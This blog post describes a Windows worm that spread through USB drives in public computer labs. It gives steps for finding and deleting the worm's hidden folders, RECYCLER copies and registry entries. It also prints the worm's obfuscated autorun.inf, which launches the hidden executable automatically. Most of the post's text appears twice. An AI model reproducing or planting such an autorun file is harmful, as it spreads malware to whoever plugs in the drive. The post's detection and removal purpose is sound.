Nasty USB Virus
While I've found a number of articles on this virus in other languages, I have yet to find any comprehensive reports of it in English (particularly the USB-infecting derivative) -- so here's one to let you all know about this.
Using a personal USB drive in public computing labs is always a hazardous and risky undertaking, but usually the benefits outweigh the risks. Additionally, if you take good care of your drive and keep a UNIX computer handy, it's generally not too hard to minimize the risk and deal with situations when they do (inevitably) arise.
And when the autorun dialog pops up and the top option /isn't/ what it would be if Windows were using your custom autorun.inf, you know you've got a problem. Lately I've discovered one virus in particular which is the subject of this post. I'll talk about detection and removal, then invite analysis of the main executable (renamed to "nissan.___" from "nissan.exe", it can be found here -- download at your own risk).
The virus hid its executable and a Desktop.ini (which I neglected to save) in a system-hidden folder on my USB drive named either KARINA, DRUGIM ("friends"?), or K (all in caps, longer than the others -- sorry, I didn't write this one down). All of these can be seen by doing "dir /A" or "ls -a" (if you have the UNIX CoreUtils installed). The contents and folders can be deleted with "del /A /F FILE" or "rm -rf FILE", but unfortunately that's not the only step involved.
They all create/modify autorun.inf on the USB drive, so that needs to be removed. Additionally, they will have copied their executable to the main hard drive's RECYCLER folder, under a subfolder of "S-1-5-". I find the best way to find them is to use "ls -al *" to list each subfolder's contents. You can then remove them the same way as above.
The last thing to do is remove the registry entries created -- there is a page on that here.
(Note: in order to do the above steps, I had to end explorer.exe and its process tree, which includes nissan.exe, then run cmd and use that. This is because nissan.exe keeps its own executable and autorun.inf in use while running, which it does as part of Winlogon when you run explorer.exe)
I'm interested to hear analysis of the executable -- let me know what you all find.
UPDATE 03-16-2010: Just had another run-in with this virus (I believe it's in the base image of every single lab computer). This time, I copied the autorun.inf it created. You can see that the exe is named differently and contained in a different folder this time -- but it's the same pattern and the autorun.inf is nearly identical.
I:\>cat autorun.inf
[autorun
$STATICSHITfasfSAfwqfjwqLOjFASFjaSLFjWLQfWFJWQLFjWLQjfwlqjfwlqfjILGFJALFJAWLCNASLIKJFWLFJWQFJWlfjWQwqLJFwqFwqJFWLQfjWLQFWQ
open=POGRESHILI///sudbinemi.exe
~dskaldkasjdiwqjdw
action=Open foldero view files usingindowsxplorer
&kjfasFkajfiwfjiwq
!ksoafasfjwifjwif
icon=%SystemRoot%\system32\SHELL32.dll,4
)djsaikfjaikfJWFwfwq
Shell\open\command=POGRESHILI///sudbinemi.exe
fasflwFwFWqkfwofjwWwq
shell\open\command=POGRESHILI///sudbinemi.exe
"mfsakfjasKFJasFajfalsfas
USEAUTOPLAY=1
*asmkddjkaDjAKfjjwlqfjwlqfjWQfjWQJFWQiljfwQ
Using a personal USB drive in public computing labs is always a hazardous and risky undertaking, but usually the benefits outweigh the risks. Additionally, if you take good care of your drive and keep a UNIX computer handy, it's generally not too hard to minimize the risk and deal with situations when they do (inevitably) arise.
And when the autorun dialog pops up and the top option /isn't/ what it would be if Windows were using your custom autorun.inf, you know you've got a problem. Lately I've discovered one virus in particular which is the subject of this post. I'll talk about detection and removal, then invite analysis of the main executable (renamed to "nissan.___" from "nissan.exe", it can be found here -- download at your own risk).
The virus hid its executable and a Desktop.ini (which I neglected to save) in a system-hidden folder on my USB drive named either KARINA, DRUGIM ("friends"?), or K
They all create/modify autorun.inf on the USB drive, so that needs to be removed. Additionally, they will have copied their executable to the main hard drive's RECYCLER folder, under a subfolder of "S-1-5-
The last thing to do is remove the registry entries created -- there is a page on that here.
(Note: in order to do the above steps, I had to end explorer.exe and its process tree, which includes nissan.exe, then run cmd and use that. This is because nissan.exe keeps its own executable and autorun.inf in use while running, which it does as part of Winlogon when you run explorer.exe)
I'm interested to hear analysis of the executable -- let me know what you all find.
UPDATE 03-16-2010: Just had another run-in with this virus (I believe it's in the base image of every single lab computer). This time, I copied the autorun.inf it created. You can see that the exe is named differently and contained in a different folder this time -- but it's the same pattern and the autorun.inf is nearly identical.
I:\>cat autorun.inf
[autorun
$STATICSHITfasfSAfwqfjwqLOjFASFjaSLFjWLQfWFJWQLFjWLQjfwlqjfwlqfjILGFJALFJAWLCNASLIKJFWLFJWQFJWlfjWQwqLJFwqFwqJFWLQfjWLQFWQ
open=POGRESHILI///sudbinemi.exe
~dskaldkasjdiwqjdw
action=Open foldero view files usingindowsxplorer
&kjfasFkajfiwfjiwq
!ksoafasfjwifjwif
icon=%SystemRoot%\system32\SHELL32.dll,4
)djsaikfjaikfJWFwfwq
Shell\open\command=POGRESHILI///sudbinemi.exe
fasflwFwFWqkfwofjwWwq
shell\open\command=POGRESHILI///sudbinemi.exe
"mfsakfjasKFJasFajfalsfas
USEAUTOPLAY=1
*asmkddjkaDjAKfjjwlqfjwlqfjWQfjWQJFWQiljfwQ
posted by Oladon | 3:06 AM
|
0 comments
